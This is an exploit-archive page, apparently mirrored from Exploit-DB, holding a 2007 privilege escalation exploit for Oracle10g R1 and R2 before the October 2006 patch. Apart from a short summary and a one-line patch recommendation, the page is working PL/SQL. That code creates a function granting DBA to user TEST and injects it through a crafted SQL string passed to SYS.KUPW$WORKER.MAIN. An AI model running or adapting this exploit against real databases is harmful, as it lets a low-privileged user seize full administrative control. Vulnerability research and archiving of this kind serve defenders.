header-logo
Suggest Exploit
vendor:
Oracle10g
by:
Joxean Koret
7.5
CVSS
HIGH
Privilege Escalation
CWE
Product Name: Oracle10g
Affected Version From: Oracle10g R1 and R2 versions prior to CPU Oct 2006
Affected Version To: Oracle10g R1 and R2 versions prior to CPU Oct 2006
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Oracle10g R1 and R2 Privilege Escalation Exploit

This exploit targets Oracle10g R1 and R2 versions prior to CPU Oct 2006. It allows an attacker to escalate their privileges by creating a session and a procedure. The exploit uses a function called F1, which is granted DBA privileges to the user 'TEST'. The exploit then executes the function and commits the changes. Finally, it retrieves user role privileges using the user_role_privs table. The exploit was developed by Joxean Koret.

Mitigation:

Apply the latest CPU patch from Oracle to fix this vulnerability.
Source

Exploit-DB raw data:

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

// milw0rm.com [2007-01-23]

Navigation

Suggest Exploit

Services By CQR